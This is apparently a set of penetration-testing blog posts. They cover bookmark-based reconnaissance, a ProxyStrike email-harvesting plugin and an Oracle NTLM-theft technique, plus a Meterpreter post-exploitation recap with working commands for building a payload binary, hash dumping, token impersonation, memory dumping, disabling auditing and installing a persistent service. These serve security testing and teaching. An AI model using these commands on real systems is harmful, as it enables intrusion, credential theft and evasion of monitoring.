Information Gathering: Delicious

Here is a new source that could help you during a Penetration Test, it's not a source that will give you results most of the times, but hey! maybe you are lucky.

Delicious is a service for keeping your bookmarks in one place (online), it's social bookmarking.

So let's go with an example; if you have some nicknames from your target, you can search directly on their Delicious profile, all their public links, for example my profile:

http://delicious.com/laramies

Remember that users can mark a link as private, but here is where we can be lucky if they forget to save it as private.

Another way of searching in Delicious, is using target company URL's or IP's, in this example i will use just a standard internal ip:

192.168.1.1

And look the second result:



The root password in the url :)

In particular cases you can obtain interesting results

-CMM

ProxyStrike Plugins update

Well this is a short post, just to let you know that the plugins framework of ProxyStrike is updated, making easier to develop your own plugins. Here is a diagram of the internal structure:


Now each plugin is a file, and here is an example of a plugin for gathering all the email addresses:

class email_detect(AttackPlugin):
       def __init__(self):
               AttackPlugin.__init__(self,name="email detect",variableSet=False,iface=True,type="tree",fields=["Url","Email"])

               self.emailre=re.compile("[a-z0-9_.-]+@[a-z0-9_.-]+",re.I)

       def process(self,req):
               html=req.response.getContent()
               a=self.emailre.findall(html)
               results=[]
               for i in a:
                       results.append([i])
               if a: 
                       self.putRESULTS([req.completeUrl,results])

You can find more examples inside the plugin folder, just get your copy via subversion:

svn checkout http://proxystrike.googlecode.com/svn/trunk/ proxystrike-read-only

More information in the wiki, and you can follow updates by deepbit in his new blog

Enjoy

-CMM

Meterpreter Post exploitation - Recap

I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first Meterpreter paper:

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.

First of all, i would like to remark that i use Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:

./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe

Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:

./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Or inside the metasploit console:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp

msf exploit(handler)> set LPORT 443

msf exploit(handler)> exploit

Well once we have a working connection, these are some things that you can do:

-Port forwarding: You can make port redirections,

meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389

-L = ip that will hold the listening port

-l = the listening port

-h = the target host

-p = the target port

Now you should connect to the exploited machine on port 444

More on forwarding and routing here

-HashDumps:

You can get the hashes of the user accounts, like the pwdump utility, for later cracking.

meterpreter> use privs (we load the privileges module)

meterpreter> hashdump

You need Admin/System privileges to work.

-User impersonation, using the token passing technique:

You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by Luke Jennings:

meterpreter> use incognito (we load the incognito module)

meterpreter> list_tokens (we list all available sessions)

meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)

You need Admin/System privileges to work.

If you want to revert the situation an obtain your original session, you can execute:

meterpreter> rev2self

More on working with Incognito and Meterpreter at Carnal0wnage

Dumping memory to extract hashes (using mdd.exe):

Here we first need to upload mdd.exe (Mantech)

meterpreter> upload mdd.exe .

meterpreter> execute -f mdd.exe -a "-o mydump.dd"

meterpreter> download mydump.dd .

Now we need can use volatility to:

• cachedump Dump (decrypted) domain hashes from the registry
• hashdump Dump (decrypted) LM and NT hashes from the registry
• hivelist Print list of registry hives
• hivescan Scan for _CMHIVE objects (registry hives)
• lsadump Dump (decrypted) LSA secrets from the registry

More information on using meterpreter + mdd + volatility on Attack Research blog

Another resource for Meterpreter plugins is the DarkOperator website, where we can find some modules like:

• Disable_Audit: Disable auditing, by changing the local security policy

• GetGui: Script for enabling RDP service on target host.

• GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.

• Memdump: Automation for mdd

• WinEnum: Script that will gather a big amount of information about the host

• Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.

• NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.

• Soundrecorder: Allows you to record sound on the target machine :)

• GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.

You can find examples of these modules and the source code in the the Darkoperator website under the meterpreter zone, many of them are included in the Metasploit project.

Meterpreter service wrapper:

You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from Phreedom.org (Alexander Sotirov)

c:> metsvc.exe install-service (it will launch on port 31337)

Well that's all for now, i will like to thanks Chris Gates and Carlos Perez (DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.

Also a big thanks for all the Metasploit team, for their great work.

Enjoy your post exploitation ...

-CMM

From Oracle to the OS with Metasploit

I'm back from my vacations, and it's time write some new posts

I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from www.dsecrg.com, they have more interesting things about Oracle penetration testing on their website.

The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.

The author explains the creation of a Metasploit plugin (ora_ntlm_stealer) to automate the process, so you can get it by updating your svn copy.

Here is the paper with the complete information

Enjoy

-CMM